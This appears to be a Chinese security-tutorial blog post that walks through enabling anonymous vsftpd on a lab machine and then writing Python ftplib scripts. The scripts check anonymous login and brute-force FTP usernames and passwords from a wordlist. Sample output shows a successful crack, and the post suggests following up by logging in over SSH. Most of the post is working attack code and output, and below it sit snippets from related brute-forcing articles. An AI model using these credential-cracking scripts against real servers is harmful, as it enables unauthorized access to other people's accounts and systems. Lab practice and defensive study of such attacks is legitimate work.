Python安全脚本开发五:爆破FTP口令

已于 2024-11-13 19:04:30 修改
阅读量388 收藏 5
点赞数 6
文章标签: 安全
于 2024-11-13 19:03:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_74218299/article/details/143726135
版权

1.检查靶机FTP安装

dpkg -l | grep vsftpd                //如果没有输出则没安装FTP

可以使用以下命令安装

sudo apt update
sudo apt install vsftpd 

使用该命令检查FTP服务是否运行

sudo netstat -tuln | grep :21

安装完成后检查配置文件中是否开启了匿名登陆

sudo nano /etc/vsftpd.conf

anonymous_enable=YES

保存后重新启动协议

sudo systemctl restart vsftpd 

 2.脚本编写

FTP的匿名登录一般有三种:
        1、 用户名:anonymous 密码:Email或者为空
        2、 用户名:FTP 密码:FTP或者为空
        3、 用户名:USER 密码:pass

        编写FTP服务的脚本需要用到python的ftplib模块。

        整个脚本分为三部分,分别为:编写简单的匿名FTP脚本、编写暴力破解FTP用户口令的脚本和编写列出FTP服务服务器文件的脚本

        anonLogin()函数接受一个ip,并且返回一个布尔值描述判断主机是否可以登录

import ftplib

def anonLogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login('anonymous','anonymous')
        print('\n[+] ' + str(hostname) + 'FTP Anonymous Login Succeeded')
        ftp.quit()
        return True
    except Exception as e:
        print('\n[-] ' + str(hostname) + 'FTP Anonymous Login Failed')
        return False
host = '192.168.145.140'
anonLogin(host)

用这样的方法可以简单判断目标主机是否开启匿名登录

        接下来是爆破的方法

import ftplib

def bruteLogin(hostname,passwdFile):
    p = open(passwdFile,'r')
    for line in p.readlines():
        user = line.split(':')[0]
        passwd = line.split(':')[1].strip()
        print('[*]Trying ' + user + ':' + passwd)
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(user,passwd)
            print('[+]Login Successful')
            print(f"Successfully cracked FTP login! Username: {user}, Password: {passwd}")
            ftp.quit()
            return user,passwd
        except Exception as e:
            print('[-]Login Failed')
            pass
    print('\n Could not brute login')
    return(None,None)

hostname = '192.168.145.140'
passwdFile = r'C:\Users\Limusi\Desktop\emmm\password.txt'
bruteLogin(hostname,passwdFile)

输出为

[*]Trying user1:password1
[-]Login Failed
[*]Trying admin:123456
[-]Login Failed
[*]Trying guest:guest123
[-]Login Failed
[*]Trying ftpuser:ftp12345
[-]Login Failed
[*]Trying test:testpass
[-]Login Failed
[*]Trying kali:kali123
[-]Login Failed
[*]Trying kali:kali
[+]Login Successful
Successfully cracked FTP login! Username: kali, Password: kali

 将两个代码结合到一起

import ftplib

def anonLogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login('anonymous','anonymous')
        print('\n[+] ' + str(hostname) + 'FTP Anonymous Login Succeeded')
        ftp.quit()
        return True
    except Exception as e:
        print('\n[-] ' + str(hostname) + 'FTP Anonymous Login Failed')
        return False
def bruteLogin(hostname,passwdFile):
    p = open(passwdFile,'r')
    for line in p.readlines():
        user = line.split(':')[0]
        passwd = line.split(':')[1].strip()
        print('[*]Trying ' + user + ':' + passwd)
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(user,passwd)
            print('[+]Login Successful')
            print(f"Successfully cracked FTP login! Username: {user}, Password: {passwd}")
            ftp.quit()
            return user,passwd
        except Exception as e:
            print('[-]Login Failed')
            pass
    print('\n Could not brute login')
    return(None,None)

if __name__ == '__main__':
    hostname = '192.168.145.140'
    passwdFile = r'C:\Users\Limusi\Desktop\emmm\password.txt'
    if not anonLogin(hostname):
        print("\nAnonymous login failed. Attempting brute force login...")
        bruteLogin(hostname,passwdFile)

FTP的账号密码和目标主机的账号密码是一样的,所以当FTP爆破成功的时候其实就是知道了对方的目标主机的账号密码,这时候不妨直接SSH连接

患100
关注
python邮箱爆破_python制作企业邮箱的爆破脚本
weixin_39908082的博客
01-30 718
按照师傅给的任务,写了一个企业邮箱的爆破脚本,后续还有FTP,SSH等一些爆破脚本。我先说下整体思路:总体就是利用python的poplib模块来从pop3服务器上交互,根据获取的相关信息,产生结果。POP3协议并不复杂,它也是采用的一问一答式的方式,你向服务器发送一个命令,服务器必然会回复一个信息.1.首先验证参数是否正确Sys.argv[]是用来获取命令行参数的,sys.argv[0]表示代...
爆破FTP服务器并尝试获取可用的FTP登录用户名称与密码
最新发布
CoffeMilk的博客
12-10 1091
我们在虚拟测试环境下进行局部渗透测试的时候,发现了FTP服务器,此时我们想要查看操作该FTP服务器,但是需要用户名称和密码,我们就可以尝试使用猜测用户名称和密码的方式去尝试登录;如果存在一些弱口令或常见用户密码则可以登录上FTP服务器进行后续的操作。
使用Ftplib暴力破解FTP用户口令
qq_68809241的博客
11-18 535
如果登录成功,打印成功消息,并返回用户名和密码。# 如果所有密码都尝试失败,打印失败消息,并返回(None, None)# 创建FTP对象,并尝试使用用户名和密码登录。# 调用bruteLogin函数,并传入FTP服务器的IP地址和密码文件路径。# 定义一个函数,用于尝试使用密码文件中的用户名和密码登录FTP服务器。# 将每行按照冒号分割为用户名和密码。# 去除密码行尾的回车和换行符。# 打印正在尝试的用户名和密码。# 指定要尝试登录的FTP服务器的IP地址。# 指定包含用户名和密码的文件路径。
口令暴力破解--Ftp协议暴力破解与Ssh协议暴力破解
薛定谔的猫
04-12 6634
服务器收到请求之后,先在该服务器上你的主目录下寻找你的公用密匙,然后把它和你发送过来的公用密匙进行比较。同时如果服务器没有其他安全限制,如登录来源IP,账户登录错误次数,则会可能存在被暴力破解的可能。打开kali-linux命令行窗口,输入ssh admin@193.168.1.26,任意输入用户名密码,提示访问被阻止。尝试登录FTP服务器,打开kali系统终端,输入ftp 193.168.1.23,随后输入上面获取的用户名和密码。输入search ftp_login,搜索ftp_login模块。
ftp服务暴力破解
m0_71366428的博客
12-14 1511
暴力破解漏洞的产生是由于服务器端没有做限制,导致攻击者可以通过暴力的手段破解所需信息,如用户名、密码、短信验证码等。暴力破解的关键在于字典的大小及字典是否具有针对性,如登录时,需要输入4位数字的短信验证码,那么暴力破解的范围就是0000~9999。
应急响应实战笔记——Windows实战篇:① FTP暴力破解
君逍遥o
04-07 1039
FTP是一个文件传输协议,用户通过FTP可从客户机程序向远程主机上传或下载文件,常用于网站代码维护、日常源码备份等。如果攻击者通过FTP匿名访问或者弱口令获取FTP权限,可直接上传webshell,进一步渗透提权,直至控制整个网站服务器。
Windows应急响应(三 FTP暴力破解)
weixin_43781139的博客
11-09 1735
0x00 前言 ​ FTP是一个文件传输协议,用户通过FTP可从客户机程序向远程主机上传或下载文件,常用于网站代码维护、日常源码备份等。如果攻击者通过FTP匿名访问或者弱口令获取FTP权限,可直接上传webshell,进一步渗透提权,直至控制整个网站服务器。 0x01 应急场景 ​ 从昨天开始,网站响应速度变得缓慢,网站服务器登录上去非常卡,重启服务器就能保证一段时间的正常访问,网站响应状态时而飞快时而缓慢,多数时间是缓慢的。针对网站服务器异常,系统日志和网站日志,是我们排查处理的重点。查...
Python安全攻防:渗透测试实战指南》配套技术讲解
Ms08067安全实验室
11-10 3837
如果你立志成为一名合格的安全从业者,想突破“脚本小子”的瓶颈,成为真正的黑客,想拥有自己打造出来的属于自己的神兵利器!《Python安全攻防:渗透测试实战指南》已经出版,配套星球现在可以...
ftp密码破解脚本
Bu2n的博客
12-20 1161
代码运行结果测试环境遇到的问题 代码 import ftplib import sys import argparse """ 测试环境python3.10 """ # 建立ftp连接 def ftp_connect(host,user,password): try: print(f'[+] 尝试登录 {password}') ftp = ftplib.FTP(host,user,password,encoding='gbk') except ftpl.
Python安全攻防-从入门到入狱
热门推荐
Yasso的博客
01-31 1万+
Python安全攻防-从入门到入狱
网络安全 批量ftp暴力破解脚本口令漏洞
04-21
批量ftp爆破脚本,支持多线程,也不长
FTP口令爆破工具
01-11
FTP口令爆破工具
rdp、ftp协议的密码爆破
过期的秋刀鱼
08-02 995
远程桌面 rdp协议 3389文件传输 FTP协议 20 21攻击方:Kali测试方:Win7两台都要在同一网段。
Python网络编程 03 实验:FTP详解
weixin_42830015的博客
05-09 1216
Python网络编程 03 实验:FTP详解
笔记-hydra工具对目标计算机的SSH(或SMB、或FTP服务)进行口令爆破
m0_74037751的博客
10-21 1125
修改vsftpd.conf 将anonymous_enable=YES ,改为NO ,然后重启vsftpd(/etc/vsftpd/vsftpd.conf。#配置虚拟机ip地址,设定为NAT连接,打开ssh服务,设置弱密码(这里设定的是root)回到kali,smbclient \\ip\共享文件夹 -U 用户名进行连接,成功拿下。hydra -l [用户名] -P [爆破字典] [IP] [服务] -vV。#靶机开启ftp服务,创建用户roott,密码QWEasd123 关闭防火墙。
python学习 - python对服务器进行FTP操作并使用密匙
weixin_tank88921的博客
06-14 403
【代码】python学习 - python对服务器进行FTP操作并使用密匙。
应用协议安全:Hydra 端口爆破工具.(九头蛇)
Karka_的博客
03-23 1396
登录、数据库、SSH、FTP 等服务.应用协议安全:Hydra 端口爆破工具.(九头蛇)Hydra(九头蛇)使用:使用方法:直接打开 kali 终端,输入.(1)实战:爆破 SSH 协议.( 22 端口 )(2)实战:爆破 远程桌面 RDP.( 3389 端口 )(3)实战:爆破 共享文件 SMB ( 445 端口 )(4)实战:爆破 邮箱协议 POP3( 110 端口 )(5)实战:爆破 文件传输 FTP ( 21 端口 )(6)实战:爆破 MSSQL数据库( 1433 端口 )
hydra暴力破解ftp-telnet-mysql-ssh-http
WEB渗透测试 从入门到萌新
10-09 7825
使用此命令,会枚举出网站已经注册的用户名,枚举出用户名之后,就可以通过xmlrpc.php或者后台登录页面进行爆破,对应的防御手段就是禁用掉xmlrpc.php并对后台进行隐藏
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值